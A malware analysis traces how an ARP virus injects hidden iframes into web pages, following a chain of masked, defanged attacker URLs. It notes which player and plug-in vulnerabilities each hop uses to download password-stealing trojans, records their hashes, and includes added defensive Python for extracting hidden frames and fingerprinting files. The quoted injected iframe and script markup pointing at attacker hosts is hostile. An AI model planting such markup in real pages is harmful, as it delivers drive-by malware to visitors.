Spread of ARP virus websites such as Trojan.PSW.Win32.OnlineGames.gen
Original author: endurer
Version 1
The virus injects the following code into web pages:
/---
<iframe src=hxxp://a**d*.1**02**4.mo*.cn/Shui**/4.htm width=0 height=0></iframe>
---/
1 hxxp://a**d*.1**02**4.mo*.cn/Shui**/4.htm
contains the code:
/---
<iframe src=hxxp://www.i**mm**m*qm.***.cn/h.htm width=0 height=0></iframe>
<iframe src=hxxp://d*m*.1**7ti**ng**gieba*.cn/c2.htm width=0 height=0></iframe>
<iframe src=hxxp://a**d*.1**02**4.mo*.cn/10wip.htm></iframe>
---/
1.1 hxxp://www.i**mm**m*qm.***.cn/h.htm contains the code:
/---
<iframe src=hxxp://0**867*5.se*r**vice-google.**.cn/VIP/cn3100.htm?BB?6 width=0 height=0></iframe>
---/
1.1.1 hxxp://0**867*5.se*r**vice-google.***.cn/VIP/cn3100.htm?BB?6 includes and outputs the code:
/---
<iframe src=wm2/index.html width=1 height=1 border=1></iframe>
<iframe style=display:none src="2.gif"></iframe>
<iframe style=display:none src="8.gif"></iframe>
<iframe style=display:none src="1.gif"></iframe>
<iframe style=display:none src="5.gif"></iframe>
<iframe style=display:none src="11.gif"></iframe>
<iframe style=display:none src="4.gif"></iframe>
<iframe style=display:none src="12.gif" width=100 height=1></iframe>
<iframe style=display:none src="2.gif"></iframe>
---/
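Every hop in this chain is the same pattern: an iframe or script that the viewer never sees, pointing either at a relative file on the same host (wm2/index.html, 2.gif) or at a third-party host. The following Python is an added triage helper, not code from the original analysis or from the attacker's pages: it pulls those references out of an HTML fragment, resolves relative paths against the serving page, and flags hidden frames and off-site loads as the next nodes to fetch in a sandbox. The sample fragment and the `*.invalid` hosts are constructed stand-ins for the masked domains above; `refang`/`defang` are helper names chosen here.

```python
"""Triage helper for injected pages: extract <iframe>/<script> src values,
resolve them against the page URL, and flag hidden or off-site references.
Added example with a constructed sample; hosts are *.invalid placeholders."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


def refang(url: str) -> str:
    """hxxp:// -> http://. urljoin only resolves relative paths for schemes it
    knows, so a defanged base URL must be refanged before resolution."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.I)


def defang(url: str) -> str:
    """http:// -> hxxp:// so reported URLs are not clickable."""
    return re.sub(r"^http(s?)://", r"hxxp\1://", url, flags=re.I)


def is_hidden_iframe(attrs: dict) -> bool:
    """display:none / visibility:hidden, or a width or height of 0 or 1 pixel,
    is the 'invisible to the user' signature used throughout the chain."""
    style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        value = attrs.get(dim, "").strip("'\" ")
        if value.isdigit() and int(value) <= 1:
            return True
    return False


class RefExtractor(HTMLParser):
    """Collects every iframe/script src with hidden/off-site flags."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = refang(page_url)
        self.page_host = urlparse(self.page_url).hostname
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        # HTMLParser already lowercases tag and attribute names and unquotes values
        a = {name: (value or "") for name, value in attrs}
        src = a.get("src", "").strip()
        if not src:
            return
        absolute = urljoin(self.page_url, refang(src))
        self.refs.append({
            "tag": tag,
            "url": defang(absolute),
            "hidden": tag == "iframe" and is_hidden_iframe(a),
            "offsite": urlparse(absolute).hostname != self.page_host,
        })


def extract_refs(html: str, page_url: str) -> list:
    parser = RefExtractor(page_url)
    parser.feed(html)
    parser.close()
    return parser.refs


def suspicious_refs(html: str, page_url: str) -> list:
    """Hidden frames and any third-party load are the candidates to follow
    next when walking a chain like 1 -> 1.1 -> 1.1.1 above."""
    return [r for r in extract_refs(html, page_url) if r["hidden"] or r["offsite"]]


# Constructed sample modelled on the 1.1.1 and 1.2.1.1 fragments above.
SAMPLE_PAGE_URL = "hxxp://example-a.invalid/VIP/cn3100.htm?BB?6"
SAMPLE_HTML = """
<IFRAME src=wm2/index.html width=1 Height=1 border=1></iframe>
<IFRAME Style=display:None src="2.gif"></iframe>
<IFRAME src=hxxp://example-b.invalid/h.htm width=0 Height=0></iframe>
<SCRIPT src=hxxp://example-c.invalid/web/1.js></SCRIPT>
<IFRAME width='10' Height='10' src='hxxp://example-d.invalid/web/3.htm'></iframe>
<IFRAME src=visible.htm width=300 height=200></iframe>
"""

if __name__ == "__main__":
    for r in suspicious_refs(SAMPLE_HTML, SAMPLE_PAGE_URL):
        flags = ",".join(k for k in ("hidden", "offsite") if r[k]) or "-"
        print(f"{r['tag']:<6} {flags:<14} {r['url']}")
```

Run against the constructed sample, the visible same-site frame is the only reference not reported; the relative `wm2/index.html` and `2.gif` come back resolved under `/VIP/`, which is what lets the next hop be fetched without guessing at paths.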
1.1.1.1.1 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/1.gif
Downloads hxxp://20***08*02*03.se**r**vice-google.***.cn/bf.exe by exploiting the Storm Player (Baofeng) vulnerability.
File description: D:/test/bf.exe
Attributes: ---
An error occurred while obtaining the file version information!
Created: 20:37:50
Modified: 20:37:50
Accessed: 20:38:47
Size: 7368 bytes, 7.200 KB
MD5: 194872cfd1ab7a9f7bf2c7fc27997c02
SHA1: 5cb01436d73551e0c60775a7049870bcb9fec91c
CRC32: 7c458325
Kaspersky reports Trojan-PSW.Win32.OnLineGames.ppu; Rising reports Trojan.PSW.Win32.OnlineGames.gen
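The file descriptions in this analysis (size, MD5, SHA1, CRC32) and the repeated "X is the same as bf.exe" notes are how the many download URLs collapse to a handful of actual payloads. The following Python is an added example, not endurer's tooling: it produces the same kind of description for a file and groups payloads that are byte-for-byte identical. The byte strings are constructed stand-ins, not the real samples; `fingerprint`, `describe` and `group_identical` are names chosen here.

```python
"""Fingerprint dropped files (size, MD5, SHA1, CRC32) and group identical
payloads. Added example with constructed sample bytes, not real malware."""
import hashlib
import zlib
from collections import defaultdict


def fingerprint(data: bytes) -> dict:
    """Same fields as the file descriptions in the analysis."""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        # mask to 32 bits so the CRC always prints as 8 hex digits
        "crc32": f"{zlib.crc32(data) & 0xFFFFFFFF:08x}",
    }


def describe(path: str, data: bytes) -> str:
    """Render a description block in the layout used above."""
    fp = fingerprint(data)
    return (
        f"File description: {path}\n"
        f"Size: {fp['size']} bytes, {fp['size'] / 1024:.3f} KB\n"
        f"MD5: {fp['md5']}\n"
        f"SHA1: {fp['sha1']}\n"
        f"CRC32: {fp['crc32']}"
    )


def group_identical(samples: dict) -> dict:
    """Map each distinct SHA1 to the sorted names of payloads sharing it, so
    '614.exe is the same as bf.exe' becomes a hash comparison rather than an
    eyeball check."""
    groups = defaultdict(list)
    for name, data in samples.items():
        groups[fingerprint(data)["sha1"]].append(name)
    return {sha1: sorted(names) for sha1, names in groups.items()}


# Constructed stand-ins for the dropped files; the real bytes are not reproduced.
_STUB = b"MZ" + b"\x00" * 62
SAMPLES = {
    "bf.exe": _STUB + b"constructed payload A",
    "614.exe": _STUB + b"constructed payload A",
    "qvod.exe": _STUB + b"constructed payload A",
    "rl.exe": _STUB + b"constructed payload B",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(describe(f"D:/test/{name}", data), end="\n\n")
    for sha1, names in group_identical(SAMPLES).items():
        print(sha1, "->", ", ".join(names))
```

When comparing against a vendor's published hashes, compare SHA1 (or better) rather than CRC32 alone: CRC32 is a checksum, not a cryptographic hash, and collisions between unrelated files are easy to produce.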
1.1.1.1.2 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/2.gif
Uses the MS06-014 vulnerability to download hxxp://20**08*02*21.se*r**vice-google.***.cn/614.exe
614.exe is the same as bf.exe.
1.1.1.1.3 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/3.gif
Uses the QvodPlayer plug-in vulnerability to download hxxp://20**08*02*03.se*r**vice-google.***.cn/qvod.exe
qvod.exe is the same as bf.exe.
1.1.1.1.4 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/4.gif
Uses the BaiduBar.Tool vulnerability to download hxxp://20**08*02*21.se*r**vice-google.***.cn/X.Cab
x.exe inside X.Cab is the same as bf.exe.
1.1.1.1.5 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/5.gif
Uses the PPStream vulnerability to download hxxp://20**08*02*03.se*r**vice-google.***.cn/pps.exe
pps.exe is the same as bf.exe.
1.1.1.1.6 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/6.gif contains the code:
/---
<iframe src=hxxp://20***08*02*21.se*r**vice-google.***.cn/VIP/OK_OK.htm width=0 height=0 border=0></iframe>
---/
1.1.1.1.6.1 hxxp://20**08*02*21.se*r**vice-google.**.cn/VIP/OK_OK.htm contains the code:
/---
<iframe src=wm2/z.html width=1 height=1 border=0></iframe>
---/
1.1.1.1.6.1.1 hxxp://20**08*02*21.se*r**vice-google.**.cn/VIP/wm2/z.html
Its content is the same as 1.1.1.
1.1.1.1.7 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/7.gif
Same as 6.gif.
1.1.1.1.8 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/8.gif
Uses the RealPlayer vulnerability to download hxxp://20**08*02*03.se*r**vice-google.***.cn/real.exe
real.exe is the same as 6.gif.
1.1.1.1.9 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/9.gif
Same as 6.gif.
1.1.1.1.10 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/10.gif
Same as 6.gif.
1.1.1.1.11 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/11.gif
Uses the GLWorld glchat.ocx vulnerability to download hxxp://20**08*02*03.se*r**vice-google.**.cn/lz3.exe
lz3.exe is the same as bf.exe.
1.1.1.1.12 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/12.gif
Uses the Thunder (Xunlei) vulnerability to download hxxp://20**08*02*24.se*r**vice-google.***.cn/xl.exe
xl.exe is the same as bf.exe.
1.1.1.1.13 hxxp://0**867*5.se*r**vice-google.**.cn/VIP/wm2/13.gif
Same as 6.gif.
1.2 hxxp://d*m*.1**7ti**ng**gieba*.cn/c2.htm contains the code:
/---
<iframe src=hxxp://vvv.m**p1**15**67.com/web/6664301.htm?Id=XSL width=100 height=0></iframe>
---/
1.2.1 hxxp://vvv.m**p1**15**67.com/web/6664301.htm?Id=XSL contains the code:
/---
<iframe src=htm.html width=100 height=0></iframe>
---/
1.2.1.1 hxxp://vvv.m**p1**15**67.com/web/htm.html includes and outputs the code:
/---
<iframe width=100 height=0 src=hxxp://vvv.m**p1**15**67.com/web/rl.htm></iframe>
<script src=hxxp://vvv.m**p1**15**67.com/web/1.js></script>
<script src=hxxp://vvv.m**p1**15**67.com/web/bf.js></script>
<script src=hxxp://vvv.m**p1**15**67.com/web/pps.js></script>
<iframe width='10' height='10' src='hxxp://vvv.m**p1**15**67.com/web/3.htm'></iframe>
---/
1.2.1.1.1 hxxp://vvv.m**p1**15**67.com/web/rl.htm
Uses the RealPlayer vulnerability to download hxxp://exe.x*in**nia*nk*l.com/rl.exe
File description: D:/test/rl.exe
Attributes: ---
An error occurred while obtaining the file version information!
Created: 20:55:38
Modified: 20:55:38
Accessed: 20:56:21
Size: 23717 bytes, 23.165 KB
MD5: bfaf373042d10517fdc0fe713bbeb093
SHA1: ad5e17bd40a7604ea3fda5a35b372fbb5ba7df2e
CRC32: b6ea58c4
Kaspersky reports Trojan-Downloader.Win32.Delf.epw [nspack]; Rising reports Trojan.DL.Win32.Direct.Me [iftdll]
1.2.1.1.2 hxxp://vvv.m**p1**15**67.com/web/1.js
Uses the MS06-014 vulnerability to download hxxp://exe.x*in**nia*nk*l.com/014.exe
014.exe is the same as rl.exe.
1.2.1.1.3 hxxp://vvv.m**p1**15**67.com/web/bf.js
Downloads hxxp://exe.x*in**nia*nk*l.com/bf.exe
bf.exe is the same as rl.exe.
1.2.1.1.4 hxxp://vvv.m**p1**15**67.com/web/pps.js
Uses the PPStream vulnerability to download hxxp://exe.x*in**nia*nk*l.com/pps.exe
pps.exe is the same as rl.exe.
1.2.1.1.5 Uses the BaiduBar.Tool vulnerability to download hxxp://exe.x*in**nia*nk*l.com/ad.cab
bd.exe inside ad.cab is the same as rl.exe.
1.2.1.1.6 hxxp://vvv.m**p1**15**67.com/web/3.htm
Downloads hxxp://exe.x*in**nia*nk*l.com/lz.exe by exploiting the hangameplugincn18.dll ActiveX control (CLSID: Taobao) of glworld, the main program of the GLWorld game hall.
lz.exe is the same as rl.exe.
1.3 hxxp://a**d*.1**02**4.mo*.cn/10wip.htm contains the code:
/---
<iframe src="hxxp://www.**5**9*.vc/page/add_753643.htm?111222222" width=0 height=0></iframe>
---/
1.3.1 hxxp://www.**5**9*.vc/page/add_753643.htm?111222222 contains the code:
/---
<script src=ADDR.js></script>
---/
1.3.1.1 hxxp://www.**5**9*.vc/page/ADDR.js
This script is unusual: it first checks whether Kaspersky Internet Security 6.0 is installed on the viewer's computer.
It outputs the code:
/---
<iframe style=display:none src="hxxp://***.w***1**8***.vg/baidu.gif"></iframe>
<iframe style=display:none src="hxxp://***.w***1*8***.vg/bf.gif"></iframe>
<iframe style=display:none src="hxxp://***.w***1*8***.vg/ms.gif"></iframe>
<iframe style=display:none src="hxxp://***.w***1*8***.vg/real.gif"></iframe>
<iframe style=display:none src="hxxp://***.w***1**8***.vg/lz.gif"></iframe>
<iframe style=display:none src="hxxp://***.w***1*8***.vg/xl.gif"></iframe>
<iframe style=display:none src="hxxp://***.w***1*8***.vg/ms.gif"></iframe>
---/
1.3.1.1.1 hxxp://***.w***1***8***.vg/baidu.gif
Uses the BaiduBar.Tool.1 vulnerability to download hxxp://***.w***1***8***.vg/Calc.Cab
Calc.Cab contains s.exe
File description: D:/test/s.exe
Attributes: ---
An error occurred while obtaining the file version information!
Created: 23:34:34
Modified: 23:34:34
Accessed:
Size: 1444 bytes, 1.420 KB
MD5: 1b27b0c37f725a140955de91c58e2266
SHA1: 95fe224a524ef3c0bbcf5494ddef5e86b3926db3
CRC32: 2c2ce980
Kaspersky reports Trojan-Downloader.Win32.Tiny.aid; Rising reports Trojan.DL.Win32.Inject.Small M [upack0.39]
1.3.1.1.2 hxxp://***.w***1***8***.vg/bf.gif
File does not exist.
1.3.1.1.3 hxxp://***.w***1***8***.vg/ms.gif
Uses the MS06-014 vulnerability to download hxxp://***.w***1***8***.vg/s.exe
1.3.1.1.4 hxxp://***.w***1***8***.vg/real.gif
Uses the RealPlayer vulnerability to download hxxp://***.w***1***8***.vg/s.exe
1.3.1.1.5 hxxp://***.w***1***8***.vg/lz.gif
Uses the GLWorld glchat.ocx vulnerability (CLSID: AE93C5DF-A990-11D1-AEBD-5254ABDD2B69, _licensed_to_="huyufeng";) to download hxxp://***.w**1*8***.vg/s.exe
1.3.1.1.6 hxxp://***.w***1***8***.vg/xl.gif
Uses the Thunder Kankan (Xunlei Kankan) vulnerability (CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F, _licensed_to_="huyufeng";) to download hxxp://***.w***1*8***.vg/s.exe